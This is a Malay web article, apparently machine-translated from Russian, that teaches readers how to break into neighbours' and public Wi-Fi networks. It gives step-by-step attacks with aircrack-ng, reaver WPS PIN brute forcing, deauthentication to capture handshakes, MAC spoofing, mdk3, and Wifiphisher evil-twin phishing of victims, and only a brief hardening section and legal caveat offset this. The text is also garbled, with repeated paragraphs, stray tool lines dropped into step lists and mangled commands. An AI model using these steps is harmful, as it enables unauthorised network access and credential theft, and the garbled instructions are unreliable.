Berikut adalah video panduan terakhir beberapa tahun sebelumnya, tetapi dalam bahasa Rusia:

  • Saya menyelesaikan ini - lihat, belajar. Maklumat di atas cukup untuk menggodam Wi-Fi dengan mudah pada mana-mana penghala (dan juga di sekolah). Ini hanya masalah masa dan kemahiran anda.
  • Internet tanpa wayar percuma boleh didapati untuk semua orang. Rangkaian Wi-Fi tersembunyi di kedai, kafe dan tempat awam lain kadang-kadang dihantui. Sebilangan orang hanya mahu memecahkan kata laluan Wi-Fi.
  • Jarang bertemu dengan orang baik yang tidak menyekat akses ke Internet mereka sendiri. Sudah jelas bahawa kafe dan hotel menarik pengunjung dengan pengedaran lalu lintas percuma. Namun, ada Wi-Fi dengan akses terbuka bukan hanya di tempat-tempat seperti itu, tetapi di jiran di pintu masuk. Sama ada ini adalah orang yang terlalu baik, atau secara semula jadi dia sangat pelupa.
  • Apa yang perlu dilakukan jika anda memerlukan Internet dengan segera, tetapi tidak ada wang untuk membayar sendiri? Trik apa yang dihasilkan oleh penggodam yang bijak? Untuk penggunaan Wai-Fai terdekat secara percuma, prosedur penggodaman serius akan dilakukan. Cara lain yang dapat membantu memotong kebenaran belum diketahui oleh orang ramai.
  • Apa yang anda tidak akan dapati di rangkaian global, bahkan perihalan aktiviti penipuan untuk mendapatkan Wi-Fi percuma. Sekiranya pengetahuan dalam bidang teknologi Internet tidak signifikan, maka lebih baik meminta bantuan penggodam yang tidak asing lagi. Siapa yang boleh mengatasi sendiri, berikut adalah beberapa kaedah popular:

meneka kata laluan;

gunakan program khas sehingga ia mengambil "kunci";

Aircrack-Ng -a2 -b 4c: Ed: FB: 8a: 4F: C0 -w /root/desktop/ww.txt / root / desktop / * cap

dapatkan PIN peranti;

Selepas melaksanakan arahan ini, proses penggodaman kata laluan akan bermula. Sekiranya kata laluan berjaya digodam - anda akan melihat sesuatu yang serupa dengan tangkapan skrin berikut.

Pancing;

memintas kata laluan.

Cara meneka kata laluan sendiri

Kata laluan penggodam yang berjaya

Pada setiap kaedah, pada mulanya anda harus memilih Wi-Fi dengan kekuatan isyarat terbaik. Memilih kaedah pertama memerlukan beberapa pemikiran. Tidak mungkin Wi-Fi yang berdekatan disulitkan secara serius. Sekiranya dia jauh dari teknologi maklumat, pengguna biasa yang tidak berpengalaman, maka dia sudah lama tidak memikirkan kerumitan gabungan tersebut. Kemungkinan besar, dia menggunakan tarikh lahir, pasangan atau anak, atau mungkin juga nama belakangnya.

Apabila pilihan termudah dengan maklumat peribadi belum berlalu, anda harus memperhatikan "kata laluan" lain yang popular. Selalunya, pengguna menggunakan kombinasi nombor berikut - "1234", "1111", "123123" dan yang serupa, serta kata laluan dari huruf - "qwerty", "kata laluan" dan lain-lain. Terdapat banyak kombinasi umum untuk melindungi Wi-Fi, rangkaian penuh dengan maklumat mengenai topik ini, dan kombinasi khusus juga disajikan.

Kelebihan kaedah ini penting - kesederhanaan, tetapi ada juga kelemahan - tempoh prosesnya. Terutama banyak masa akan dihabiskan untuk mengehadkan usaha input. Sekiranya terdapat perkara seperti itu di Wi-Fi orang lain, maka setelah tiga percubaan yang tidak berjaya, kata laluan harus dimasukkan hanya sehari kemudian.   Perisian meneka kata laluan

Bagaimana cara memecahkan kata laluan Wi-Fi yang kompleks? Prinsip program seperti itu mudah, mereka beroperasi secara analogi dengan seseorang. Hanya komputer beberapa kali lebih pantas dan lebih pintar. Program mempunyai keseluruhan kamus dengan kombinasi yang popular. Kadang kala mesin mengambil kata laluan dalam beberapa minit, kadangkala prosesnya memakan masa beberapa hari. Pertama, versi mudah digunakan, kemudian versi kompleks. Masa pengecaman bergantung pada kerumitan kata laluan. Teknologi ini juga disebut "brute force", yang bermaksud pencarian kata laluan.

Untuk kenalan contoh program - Aircrack-ng, Wi-Fi Sidejacking, Wi-Fi Unlocker AirSlax dan lain-lain. Terdapat banyak dari mereka di Internet, ini hanya sebahagian kecil. Dengan memuat turun perisian tersebut, penipu sendiri berisiko ditipu. Trojan dan masalah lain akan mengambil alih komputer anda dengan serta-merta.

Bagaimana anda mengawal keselamatan rangkaian wayarles anda?

Idea untuk memasukkan teknik mencari kata laluan adalah bijak. Walau bagaimanapun, kaedah ini juga mempunyai kekurangannya. Yang utama adalah hasil negatif. Pemilihan mungkin tidak berjaya. Ini bermaksud gabungan simbol, huruf dan angka yang terlalu kompleks difahami, yang belum biasa dengan program seperti ini.

Baca juga:

Apa yang perlu dilakukan jika penghala tidak menyebarkan Internet melalui WiFi?

Mendapatkan PIN adalah tugas yang mudah. Mengapa perlu dikunjungi dan ditulis semula dari badan peranti untuk menyebarkan Wi-Fi. PIN terdiri sepenuhnya dari nombor. Peranti tidak akan selalu berada di tempat yang mudah, tetapi ada jalan keluar sekiranya berlaku kegagalan.

Cara lain untuk mendapatkan PIN adalah dengan menggunakan program khas. Anda boleh menggunakan, misalnya, CommView atau Blacktrack. Cara menggodam Wi-Fi yang dilindungi kata laluan ini tidak mudah. Peranti Wi-Fi sentiasa bertukar paket maklumat antara peranti lain yang memasuki jangkauannya. Tujuannya adalah untuk memintas data.

Anda perlu bertindak melalui komputer atau komputer riba dengan perkakasan yang kuat, mempunyai kad Wi-Fi dengan fungsi mod Monitor. Buat cakera bootable atau pemacu kilat USB dengan pengedaran perisian menangkap paket, pasang cengkerang pada PC. Pilih rangkaian, dan kemudian tunggu proses memintas kira-kira 10,000 paket. Pertama, program akan mengeluarkan PIN, dan kemudian kata laluan.

Bahan video mengenai penggodaman rangkaian menggunakan perisian pihak ketiga:

VIDEO

Beberapa penghala mempunyai butang yang sangat tidak berguna - WPS, yang membolehkan anda menyambungkan peranti dalam mod yang dipermudahkan. Secara lalai, banyak penghala masih mengaktifkan WPS. Dan sambungan ke rangkaian seperti itu dilakukan hanya dengan memasukkan kod PIN ini, yang hanya terdiri dari angka.

Petua: Ingat PIN anda. Apabila pemilik menukar kata laluan, akan lebih mudah ditebak jika anda mengetahui PIN.

Tukar Alamat Mac

Hacking Neighbor Wi-Fi dalam masa 5 minit: 100% Kaedah kerja Belajar kata laluan

Bagaimana lagi untuk melindungi Wi-Fi dengan kata laluan? Dalam kaedah yang disajikan, pertanyaannya, pada dasarnya, tidak relevan, kadang-kadang pengguna membiarkan rangkaian terbuka, tetapi meletakkan penapis dengan alamat MAC. Ini adalah pengecam khusus untuk setiap peranti. Anda boleh mengetahui alamat MAC yang dibenarkan menggunakan program khas. Contohnya, Airdump-ng.

  1. Video:
  2. Setelah mengetahui senarai putih "pengecam", kami mengubah senarai kami. Untuk melakukan ini, buka "Panel Kawalan", klik "Rangkaian dan Pusat Perkongsian", kemudian pilih "Ubah tetapan penyesuai rangkaian". Pilih sambungan rangkaian yang diperlukan, pergi ke "Properties". Konfigurasikan rangkaian - masukkan alamat MAC 12 aksara. Seterusnya, mulakan semula dan voila, semuanya berjaya.
  3. Phishing adalah salah satu kaedah penipuan dalam talian. Ini membolehkan anda menipu pengguna untuk mendapatkan nama pengguna dan kata laluan. Oleh itu, setelah melayari laman web ini, anda boleh mengunjungi halaman pancingan data dan memasukkan data anda, yang akan diserang oleh penyerang.
  4. Maklumat dengan data rahsia mengenai Wi-Fi dijumpai menggunakan program WiFiPhisher.
  5. Bagaimana perisian berfungsi:
  6. Mengkonfigurasi HTTP dan HTTPS;

Cari rangkaian tanpa wayar wlan0 dan wlan1 sebelum menyambung ke salah satu daripadanya;

DHCP pengintipan dan penyenaraian alamat IP;

Pemilihan salah satu titik Wi-Fi yang ada;

Salinan titik akses dibuat dan diberi nama yang sama. Kelajuan titik sebenar menurun, kerana pengguna mula menyambung semula dan mendapatkan salinannya.

Penyemak imbas meminta kata laluan, pengguna mengisi lapangan dan kata laluan jatuh ke tangan penipu melalui WiFiPhisher.

  1. Arahan video:
  2. Penipu kini mempunyai kemampuan untuk mengkonfigurasi penghala pihak ketiga. Dia dapat menukar PIN WPS, melihat data untuk mendapatkan kebenaran dari sumber apa pun. Dengan hak istimewa tersebut, menjadi mungkin untuk mengirim pengguna perkhidmatan perbankan ke laman web lain, mendapatkan "milik mereka".
  3. Petua: Agar tidak jatuh ke dalam tipu muslihat "pancingan data", anda harus selalu memeriksa laman web yang anda lawati dengan teliti.
  4. Pilihan untuk melindungi rangkaian anda sendiri

Kelebihan kaedah ini penting - kesederhanaan, tetapi ada juga kelemahan - tempoh prosesnya. Terutama banyak masa akan dihabiskan untuk mengehadkan usaha input. Sekiranya terdapat perkara seperti itu di Wi-Fi orang lain, maka setelah tiga percubaan yang tidak berjaya, kata laluan harus dimasukkan hanya sehari kemudian.   Ternyata, ada banyak pilihan untuk mengintip data dari Wi-Fi. Sesiapa yang mempunyai penghala di rumah atau di pejabat harus menyukarkan akses pihak ketiga. Jika tidak, semua orang berisiko ditipu dengan kejam. Kami mengesyorkan menggunakan petua berikut:

Kak-vzlomat-parol-ot-wi-fi-10.jpg

Tentukan kombinasi kompleks untuk kata laluan - sekurang-kurangnya 10-12 aksara, di mana untuk mengambil kira susun atur papan kekunci, kotak, tanda dan nombor.

Matikan WPS, fungsi ini mengingati pengguna yang dibenarkan dan menyambungkannya semula secara automatik.

Mengubah PIN peranti yang digunakan secara berkala, serta mengeluarkan prasasti kilang dari casing tersebut.

Kak-vzlomat-parol-ot-wi-fi-4.jpg

  • Hadkan akses ke maklumat PIN, jangan masukkan ke laman web yang meragukan. Cara menetapkan semula tetapan penghala Wi-Fi - mengembalikan tetapan kilang
  • Langkah-langkah ini akan membantu anda mengamankan rangkaian anda dengan cekap. Kini hanya boleh diretas oleh penggodam dengan huruf besar. Yakinlah bahawa jika penggodaman berjaya, ia berada di tempat yang berdekatan. Hanya lokasi dekat penyerang yang dapat menghasilkan hasil yang berjaya. Aplikasi data terkenal berjuta-juta Wi-Fi

Atau mungkin tidak perlu menggodam Wi-Fi yang dilindungi? Pengguna di seluruh dunia telah membuat sejenis pangkalan data dengan kata laluan dan titik Wi-Fi. Untuk mengaksesnya, anda harus memuat turun program siap pakai dan memilih rangkaian yang diinginkan. Maklumat diperoleh dalam aplikasi berikut:

Peta Wi-Fi

- aplikasi universal untuk mana-mana platform telefon, ia akan menunjukkan titik dan kata laluan Wi-Fi terdekat jika seseorang telah menyambung ke rangkaian yang dipilih lebih awal;

Shift WiFi

Kak-vzlomat-parol-ot-wi-fi-7-800x349.png

- aplikasi yang popular untuk pengguna sistem Android, serta program sebelumnya, ia menunjukkan semua kata laluan yang disimpan sebelumnya ke Wi-Fi.

  • Gambaran keseluruhan aplikasi Peta Wi-Fi:
  • Senarai aplikasi sedemikian berkembang secara beransur-ansur. Terdapat risiko mendapatkan produk berkualiti rendah. Selalu lebih selamat memuat turun perisian dari sumber rasmi dan dipercayai.
  • Menggodam Wi-Fi dari telefon anda

Hari ini, mungkin untuk menggodam rangkaian Wi-Fi walaupun dari alat mudah alih. Ia lebih senang daripada menggunakan PC. Lebih mudah mendekatkan telefon ke peranti yang perlu di-jailbreak. Terdapat banyak aplikasi percuma dan berbayar di luar sana. Sebahagian daripada mereka adalah penipuan. Berbayar sesama mereka mungkin berbeza dalam realisasi pangkalan data. Sedang diketahui:

Prank Wi-Fi; WiHask Mobile;

IWep Lite. Prank Wi-Fi

- Aplikasi "brute force". Untuk pengoperasiannya, muat turun pangkalan data tambahan diperlukan. Kemudian secara automatik mengambil kata laluan yang betul. Sesuai untuk Android.

WiHask Mudah Alih

Kak-vzlomat-Parol-OT-Wi-Fi-12-800x472.png

- beroperasi mengikut algoritma tertentu, tidak memerlukan pangkalan data tambahan. Berfungsi sehingga kata laluan tersembunyi dijumpai. Berdasarkan teknologi brute force yang sama. Diagihkan untuk sistem Android.

IWep Lite

- mencari kata laluan pada alat iPhone. Prosedur pengaktifan diperlukan agar aplikasi berfungsi. Anda perlu mencari rangkaian dan memilih statistik. Selepas itu, carian automatik bermula sehingga jawapan yang memuaskan dengan kod.

Tanggungjawab untuk menggodam

Tidak hairanlah mereka mengatakan bahawa keju percuma hanya terdapat dalam perangkap tikus. Kata-kata ini boleh digunakan di Internet juga. Penggunaan percuma hanya sah di tempat umum, di mana pemikiran itu tidak terlintas - adakah realistik untuk menggodam Wi-Fi yang tersedia, kerana ia berada di domain umum. Di sini semua orang boleh menggunakan rangkaian sepenuhnya.

  1. Meretas alat orang lain adalah perkara yang berbeza. Dengan kata lain, ia adalah penipuan. Dan tindakan sedemikian tidak sah. Semua pelanggaran jenayah di negara kita dibatasi oleh undang-undang. Semua "orang pintar" akan menemui artikel dalam Kanun Jenayah Persekutuan Rusia. Jangan mengambil risiko, sambung atau bayar internet anda sendiri.
  2. Maksudnya, tidak mustahil untuk menentukan IP penggodam sebenar untuk pengguna biasa rangkaian Wi-Fi, yang bermaksud bahawa identiti penggodam tetap tidak diketahui. IP "freeloader" yang sebenarnya hanya dapat dikenali oleh orang yang mempunyai kuasa perundangan, dengan mana dia dapat memperoleh akses ke maklumat dari penyedia). Oleh itu, sama ada menggunakan atau tidak panduan berikut: "Bagaimana untuk menggodam WiFi?" - untuk tujuan mementingkan diri sendiri, sepenuhnya bergantung pada hati nurani pengguna itu sendiri.
  3. Teknik Penggodaman Wi-Fi Asas
  4. Perlu sedikit usaha untuk menguasainya dan senyum jahat tidak lagi meninggalkan wajah pengguna seperti itu, kerana dia selalu (di mana ada Wi-Fi) dapat terus berhubungan secara percuma dan memuat turun apa sahaja yang dia mahukan dari Internet secara percuma.

Cara paling mudah untuk menyambung adalah dengan mengesan rangkaian yang tidak selamat:

Melalui "Panel Kawalan" masukkan tab "Rangkaian dan Internet"; Pergi ke "Pusat Sambungan Rangkaian"; Kemudian buka tab "Sambungan rangkaian";

Senarai rangkaian akan muncul, dari mana anda harus memilih tidak dilindungi oleh kata laluan dan menyambung ke sana.

Kami memilih kata laluan untuk wi-fi secara manual

Selalunya, pemilik penghala meletakkan kod akses yang mudah diingat, misalnya, terdiri daripada tujuh atau lapan nombor atau simbol yang sama, atau masukkan "12345678" atau "QWERTY", sebagai contoh,

kata laluan wifi yang paling popular di Rusia dan dunia ... Jelas sekali, kata laluan seperti itu dapat dipilih dengan mudah walaupun secara manual, dan aplikasi khas dapat mengatasinya dalam beberapa minit.

Untuk menyahsulit kod yang diterima, aplikasi atau perkhidmatan khas digunakan.

Seterusnya, kita akan melihat lebih dekat topik bagaimana memecahkan kata laluan wi-fi, menggunakan pelbagai kaedah dan utiliti yang dirancang untuk tujuan ini.

Program kekerasan untuk meneka kata laluan automatik

Kekerasan

  • Merupakan teknologi untuk memilih kod akses oleh program dalam mod automatik.
  • Pengguna yang berpengalaman menulis sendiri aplikasi tersebut. Mereka sengaja menggodam rangkaian sasaran, surat, sumber, dll Juga, banyak penggodam menggunakan utiliti siap pakai. Sebagai contoh, "Proxy Grabber" secara automatik memaparkan maklumat mengenai penyambungan ke pelayan.
  • Penyerang menerima fail dengan semua data, yang kemudian diterapkan dalam aplikasi brute-force. Perpustakaan dengan kombinasi nama dan kata laluan juga dimasukkan ke dalam aplikasi (perpustakaan diedarkan di forum penggodam dan sentiasa dikemas kini). Utiliti secara automatik mengubah proksi, sehingga pelayan web tidak dapat mengenal pasti serangan, dan oleh itu penyusup.

Brute force menganalisis kira-kira satu atau dua ratus aliran pada satu masa. Semakin tinggi nombor ini, semakin cepat wi-fi akan diretas. Walau bagaimanapun, jumlahnya dibatasi oleh kekuatan PC. Pada komputer dengan kuasa rendah, anda harus menjalankan tidak lebih dari 100 pemeriksaan gabungan pada masa yang sama; oleh itu, dengan nilai tersebut, prosedur dapat berlarutan untuk waktu yang lama (kadang-kadang memerlukan beberapa hari).

Aplikasi Brutus Paling Popular:

  • Brutus AET;
  • Pemeriksa Semua dalam Satu;
  • Pembuka Kata Laluan Appnimi.

Menyelesaikan kata laluan menggunakan kod PIN peranti

Untuk meneka kata laluan untuk rangkaian Wi-Fi yang dilindungi WPA / WPA2, anda memerlukan: PC dengan penyesuai Wi-Fi (hampir semua komputer riba dan netbook sudah mempunyai modul terbina dalam);

  1. Pemacu denyar USB tidak kurang dari 2 Gb;
  2. Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  3. Dianjurkan untuk melakukan operasi dasar di lingkungan Linux, walaupun mungkin dilakukan dengan menggunakan OS Windows, tetapi di Linux semuanya lebih mudah. Anda perlu memformat pemacu kilat USB dan menyimpan pakej "WiFi Slax" di atasnya.
  4. Weifai-Slax dilancarkan terus dari media luaran, cukup luaskan kandungan direktori "boot" dan klik pada "Wifislax Boot Installer". Seterusnya, tentukan parameter s dan klik "Enter".
  5. Kemudian mulakan PC dari pemacu kilat yang dibuat dan lakukan langkah-langkah berurutan berikut:
  6. Tentukan boot dengan kernel SMP dan wifislax dengan KDE dengan pembetulan;
  7. Tunggu;
  8. Setelah muat turun selesai, disarankan untuk menukar MAC komputer riba dengan menjalankan "ifconfig wlan0 down" di konsol;
  9. Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  10. Sekarang buka aplikasi "Macchanger";
  11. Klik "Tukar MAC";
  12. Keluar dari utiliti dan jalankan “ifconfig wlan0 up;
  13. Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  14. Buka utiliti "minidwep-gtk";
  15. Klik "Imbas";
  16. Sekiranya di antara titik-titik yang terdapat terdapat sokongan WPS, maka itu adalah yang paling mudah dan cepat untuk diretas.
  17. Penggodam newbie disarankan untuk meretas poin dengan WPS aktif dan hanya setelah mendapat pengalaman meneruskan tugas yang rumit. Serlahkan titik dan klik "Reaver";
  18. Klik "ok";
  19. Utiliti akan menunjukkan kata laluan;
  20. Sekiranya serangan itu tidak berjaya kerana penyekat WPS, maka paket yang direkodkan pada pembawa USB mengandungi cara untuk memintasnya;
  21. Sekiranya tidak terdapat titik dengan WPS, maka sangat mudah untuk meneka kata laluan apabila sekurang-kurangnya satu alat PC atau mudah alih sudah disambungkan ke rangkaian. Setelah menunggu seseorang (mangsa) menyambung ke Wi-Fi. Anda harus memilihnya dan klik "Attack";
  22. Modul wayarles yang dibina ke dalam komputer riba akan menimbulkan gangguan dan "mangsa" akan terputus dari Wi-Fi;
  23. Sudah tentu, mangsa akan membuat percubaan untuk menyambung semula, dan ini akan menghasilkan "Handshake" pada peranti mangsa dengan penghala dengan pertukaran data yang mudah dipintas. Maklumat yang diambil disimpan sebagai fail;
  24. Seterusnya, anda harus menulis fail ke memori komputer riba dan mulakan semula;
  25. Jalankan Windows dalam komputer riba;
  26. Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  27. Fail yang disalin mempunyai kod akses Wi-Fi yang dienkripsi. Untuk melihatnya, anda perlu memasang utiliti Elcomsoft Wireless Security Auditor;

Klik data import - TCPDUMP; Selepas itu, dengan satu jari, klik pada "Ctrl" dan, tanpa melepaskannya, klik pada butang dengan huruf Inggeris "I";

Nyatakan fail yang disalin;

Klik "Jalankan ...";

Selesai.

Catatan:

WPS adalah kerentanan teknologi penyulitan. Sambungan dibuat menggunakan kod PIN. Sebagai contoh, PIN boleh mengandungi lapan karakter, iaitu, setelah melalui sekitar seratus juta varian kod PIN, penggodaman rangkaian Wi-Fi akan berhasil diselesaikan. Kelemahan teknologi ini adalah dibenarkan untuk membahagikan PIN menjadi beberapa bahagian. Akibatnya, diperlukan untuk menganalisis bahagian maksimum empat aksara, dan ini mengurangkan jumlah pilihan dengan beberapa urutan besarnya (hingga 10 ribu).

  1. Kami menggunakan pancingan data
  2. Banyak pengguna menyukai kaedah "Phishing". Kaedah ini berdasarkan manipulasi cracker, memaksa pemilik rangkaian Wi-Fi untuk memberikan nama dan kata laluan sendiri.
  3. Pada dasarnya, "kait" dilemparkan melalui mesej e-mel atau rangkaian sosial, tetapi dalam kes Wi-Fi, "mangsa" akan mula mengesyaki bahawa ada sesuatu yang salah. Oleh itu, penggodam membuat muslihat dengan cara yang berbeza, misalnya, mengatur rangkaian pendua dengan nama yang sama (nama Wi-Fi mangsa dan yang dibuat oleh cracker adalah sama). Akibatnya, apabila pengguna yang tidak bernasib baik tersambung ke Wi-Fi palsu, dia menentukan kata laluan. Pemilik rangkaian palsu dengan mudah membaca kod akses yang dimasukkan dan mematikannya. Kemudian, dalam mod biasa, ia tersambung ke Wi-Fi, kerana kata laluan sudah diketahui olehnya.
  4. Teknik ini mudah dilaksanakan, namun, penggodam malas dan menjadikannya lebih mudah bagi mereka untuk menggodam dengan mengembangkan aplikasi khas "Wifiphisher".
  5. Ikut langkah-langkah ini:
  6. Pasang program Weifisher pada PC (tersedia secara percuma di Internet);
  7. Putuskan sambungan pengguna dari Wi-Fi;
  8. Tunggu sehingga program menukar penghala mangsa ke mod titik akses dan membuat pendua rangkaian dengan nama yang sama;

Seterusnya, utiliti akan menjalankan beberapa autotuning tambahan;

Kak-vzlomat-parol-ot-wi-fi-3-800x534.jpgKemudian aplikasi akan memaparkan tetingkap palsu pada PC atau peranti mangsa, yang akan meminta anda mengemas kini perisian;

Mangsa akan menentukan kata laluan untuk mengemas kini perisian;

  • Oleh kerana pemilik menu palsu adalah penggodam, kata laluan yang dimasukkan oleh mangsa akan dipaparkan di monitor PCnya;
  • Ia dilakukan.
  • Aplikasi penyimpanan kata laluan WiFi

Banyak program yang mudah dibuat, dengan pangkalan data log masuk dan kata laluan yang luas untuk rangkaian Wi-Fi di seluruh dunia. Utiliti ini mengumpulkan kod akses Wi-Fi yang dimasukkan pengguna dan terus mengemas kini kod tersebut. Kemudahannya ringkas dan dilengkapi dengan menu intuitif. Selalunya pengguna hanya diminta untuk mengaktifkan carian Wi-Fi dan memilih rangkaian yang tersedia.

Yang paling popular adalah program berikut:

WiFi Anda;

Klik data import - TCPDUMP; Kata Laluan Wi-Fi;

Imbasan Penghala.

Tidak begitu popular, tetapi tidak kurang berkesan, adalah program "peta Wi-fi" dan "Swift WiFi". Mereka secara visual menunjukkan kepada pengguna titik Wi-Fi di peta dan secara automatik menyambung ke titik terdekat.

Kami menyambung ke rangkaian WiFi terbuka dengan menyaring dengan alamat mac

Beberapa pengguna mempunyai harapan yang tinggi untuk memastikan keselamatan rangkaian mereka dengan menyaring berdasarkan alamat MAC, namun, dalam praktiknya, bahkan penggodam pemula melewati perlindungan semacam itu lebih cepat daripada pemilik router memasuki konfigurasi web peranti dengan hak pentadbir. Prosedur untuk menukar MAC penyesuai wayarles di Linux hanya memerlukan beberapa saat, misalnya, dengan perintah "ifconfig wlan0 down". Juga, utiliti "Macchanger" membolehkan anda menetapkan MAC secara automatik, akibatnya, bahkan pemilik rangkaian yang maju secara teknikal akan keliru. Dan jika mangsa menggunakan senarai putih, aplikasi "Airodump-ng" membantu menentukan alamat setia. Utiliti memaparkan MAC yang dibenarkan di lajur "STATION".

  1. Anda juga dapat mengenal pasti MAC yang sah menggunakan Brute force, yang telah disebutkan pada awal artikel ini.
  2. Aplikasi mdk3 dalam mod brute force juga mampu mengambil MAC. Kelebihan utama utiliti adalah kemampuan untuk mengesan MAC walaupun tanpa adanya peranti yang disambungkan ke penghala tanpa wayar. Contohnya, anda boleh menggunakan arahan: mdk3 wlan0 f -t 20: 25: 64: 16: 58: 8C -m 00:12:34.
  3. Melindungi rangkaian WiFi anda dari penggodaman
  4. Semakin banyak langkah perlindungan yang anda berikan, semakin lama dan semakin sukar untuk menggodam rangkaian anda, dan penggodam pemula mungkin benar-benar meninggalkan ideanya. Oleh itu, disarankan untuk menggunakan semua cadangan di bawah, tanpa kehilangan satu cadangan.
  5. Tetapkan kata laluan untuk memasuki konfigurasi web penghala
  6. Di antara muka web penghala, buka tab "Alat Sistem".
  7. Kemudian masukkan subseksyen "Kata Laluan" dan tetapkan kod akses yang selamat. Pastikan untuk mengklik "Simpan" setelah selesai.
  8. Tetapkan kod akses untuk rangkaian Wi-Fi.

Masukkan tab "Tanpa Wayar" dan kemudian pergi ke bahagian "Keselamatan Tanpa Wayar". Tetapkan jenis enkripsi "WPA / WPA2" dan tunjukkan imaginasi anda untuk menetapkan kata laluan yang kompleks. Simpan parameter yang dimasukkan dan mulakan semula penghala.

  1. Sembunyikan nama wi-fi
  2. Buka semula tab "Tanpa Wayar". Nyahtanda kotak "Dayakan Siaran SSID".
  3. Klik "Simpan".
  4. Aktifkan penapisan MAC
  5. Tentukan peranti MAC yang akan dibenarkan menyambung ke Wi-Fi (contohnya, anda dapat melihat alamat telefon pintar di bahagian tetapan "Mengenai telefon"). Kemudian buka subseksyen "Penapisan MAC Tanpa Wayar" di tab "Tanpa Wayar".
  6. Klik pada "Enable" dan aktifkan kotak "Benarkan stesen yang ditentukan oleh entri yang diaktifkan dalam senarai untuk diakses".
  7. Kemudian klik "Tambah Baru ...".

Tentukan MAC dengan status diaktifkan.

Klik "Simpan".

Matikan QSS (WPS).

Buka tab "WPS" (dalam beberapa antarmuka model router disebut "QSS"). Klik "Lumpuhkan WPS".

Mulakan semula penghala.

Bagaimana cara menggodam Wi-Fi dari telefon?

Cara termudah adalah dengan memasang aplikasi Kali Linux percuma dari gedung aplikasi pada telefon pintar atau tablet anda dan melancarkannya.

Penggunaan program tidak menimbulkan masalah, kerana kebanyakan proses di dalamnya adalah automatik. Sekiranya mustahil untuk memasang utiliti di atas, disarankan untuk mencari dan memasang "Linux Deploy" di pasaran, yang menuanya juga tidak rumit.

Walaupun alat ini mudah dipasang, mereka adalah alat keropok canggih yang dapat digenggam oleh penggodam baru. Pengguna lanjutan sering menggunakan WiFinspect untuk menggodam. Ini membolehkan anda memaparkan maklumat terperinci mengenai cara operasi rangkaian yang dikesan. Program ini juga diedarkan secara bebas, tetapi beberapa fungsinya memerlukan root untuk berfungsi.

Sekiranya anda mempunyai kuasa Root, anda juga boleh menggunakan alat Wifi Analyzer yang hebat. Dia berjaya mengatasi tidak hanya dengan rangkaian Wi-Fi pada frekuensi 2.4 GHz, tetapi juga 5 GHz.

Pemilik telefon Apple berjaya menggodam Wi-Fi jiran dengan memasang Airslax atau Aircrack-ng.

Mengapa berbahaya menggunakan wifi jiran?

Beberapa rangkaian tetangga terbuka yang tidak dienkripsi dan tidak mempunyai perlindungan penyadapan berbahaya untuk digunakan.

Oleh kerana setiap penyerang yang menyambung ke Wi-Fi seperti itu dapat memintas dan mengimbas lalu lintas pelanggan mana pun.

Sekiranya rangkaian dienkripsi dan dilindungi, maka bahayanya dikurangkan, tetapi wi-fi untuk menggunakannya mesti diretas, dan ini dapat dihukum berdasarkan Artikel 272 dan 273 Kanun Jenayah Persekutuan Rusia.

Jelas, untuk menghukum penggodam, anda perlu mencarinya, misalnya, dengan mendedahkan IPnya. Harus diingat bahawa untuk ini, mangsa perlu membuat permintaan yang sesuai kepada syarikat penyedia. Syarikat komunikasi yang menyediakan perkhidmatan komunikasi untuk akses Internet hanya dapat melepaskan maklumat kepada pekerja VIB atau orang dari agensi kerajaan dengan lebih banyak kuasa. Tidak mungkin bagi orang biasa untuk mendapatkan data secara langsung.

Hukuman kerana menggodam rangkaian Menggodam wifi: Program dan Aplikasi Banyak utiliti telah dikembangkan untuk menggodam rangkaian Wi-Fi. Sebilangan dari mereka mungkin kelihatan terlalu mudah digunakan, tetapi itu tidak mengurangkan keberkesanannya. Aplikasi dikeluarkan untuk semua platform yang ada, di bawah ini kami akan mempertimbangkan yang paling popular daripadanya.

  • Di bawah Windows
  • Untuk platform paling popular di dunia, sebilangan besar aplikasi retak dilancarkan.
  • Kekurangan
  • - Berfungsi hampir sepenuhnya secara automatik. Teknik pemilihan digunakan.
  • Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  • Langkah-langkah:

Jalankan "WifiCrack.exe";  — Banyak utiliti telah dikembangkan untuk menggodam rangkaian Wi-Fi. Sebilangan dari mereka mungkin kelihatan terlalu mudah digunakan, tetapi itu tidak mengurangkan keberkesanannya. Aplikasi dikeluarkan untuk semua platform yang ada, di bawah ini kami akan mempertimbangkan yang paling popular daripadanya.

  • Tandakan rangkaian;
  • Klik "Seterusnya";
  • Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  • Aktifkan pangkalan data dengan kata laluan dan klik "Mula";
  • Sekarang direktori aplikasi berisi file "Good.txt", yang memaparkan kata laluan dan log masuk.
  • Kali Linux
  • Pasang Kali Linux ke mesin maya Vmware;
  • Jalankan program dan pilih "Live";
  • Masukkan "iwconfig";
  • Tuliskan nama antara muka yang ditunjukkan pada sehelai kertas;
  • Jalankan "airmon-ng start wlan0";
  • Utiliti Elcomsoft Wireless Security Auditor untuk Windows.
  • Kemudian "airodump-ng mon0";

Klik "ctrl + c";

Masukkan "wash -i mon0 -C";

Tentukan wifi dengan WPS;  — Banyak utiliti telah dikembangkan untuk menggodam rangkaian Wi-Fi. Sebilangan dari mereka mungkin kelihatan terlalu mudah digunakan, tetapi itu tidak mengurangkan keberkesanannya. Aplikasi dikeluarkan untuk semua platform yang ada, di bawah ini kami akan mempertimbangkan yang paling popular daripadanya.

  • Masukkan "reaver -i mon0 -b (nama yang ditulis sebelumnya pada sehelai kertas) -a -vv";
  • Log masuk dan kod akan muncul di monitor.
  • Untuk Android

Kadang-kadang sangat tidak senang menggunakan komputer riba untuk menggodam. Penggunaan alat android padat lebih kurang ketara.  — Banyak utiliti telah dikembangkan untuk menggodam rangkaian Wi-Fi. Sebilangan dari mereka mungkin kelihatan terlalu mudah digunakan, tetapi itu tidak mengurangkan keberkesanannya. Aplikasi dikeluarkan untuk semua platform yang ada, di bawah ini kami akan mempertimbangkan yang paling popular daripadanya.

  1. Sambungan WPS
  2. Selepas memasang, jalankan program dan ketuk ikon yang dilingkari merah pada tangkapan skrin di bawah;
  3. Ketik rangkaian mangsa;
  4. Ketuk "Tunjukkan kata laluan", kod akses akan dipaparkan.

